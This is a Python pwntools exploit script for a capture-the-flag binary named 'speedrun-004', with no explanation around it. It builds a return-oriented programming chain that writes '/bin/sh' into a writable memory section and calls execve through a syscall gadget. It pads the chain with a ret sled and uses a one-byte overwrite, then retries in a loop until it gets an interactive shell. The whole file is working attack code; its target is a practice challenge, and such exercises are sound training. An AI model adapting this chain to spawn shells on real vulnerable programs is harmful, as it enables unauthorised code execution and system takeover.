from pwn import *

#p = process("./speedrun-004")
'''
p = gdb.debug("./speedrun-004", gdbscript = 
b *0x400bcf
)
'''

pop_rdi = 0x0000000000400686
pop_rsi = 0x0000000000410a93
pop_rdx = 0x000000000044c6b6
mov_ptr_rsi_rax = 0x000000000047f521
pop_rax = 0x0000000000415f04
rw_section = 0x6b6050
ret = pop_rdi + 1
syscall = 0x000000000040132c

payload = b""
payload += p64(pop_rax) + b"/bin/sh\x00"
payload += p64(pop_rsi) + p64(rw_section)
payload += p64(mov_ptr_rsi_rax)
payload += p64(pop_rax) + p64(0x3b)
payload += p64(pop_rdi) + p64(rw_section)
payload += p64(pop_rsi) + p64(0)
payload += p64(pop_rdx) + p64(0)
payload += p64(syscall)

payload = p64(ret) * ((0x100 - len(payload))//8) + payload + p8(0)

while(True):
    p = process("./speedrun-004")
    
    p.sendafter(b"say?\n", b"257")
    p.sendafter(b"yourself?\n", payload)
    
    try:
        p.sendline(b"echo vani5hing")
        p.recvuntil(b"vani5hing")
        break
    except:
        try:
            p.close()
        except:
            pass

p.interactive()
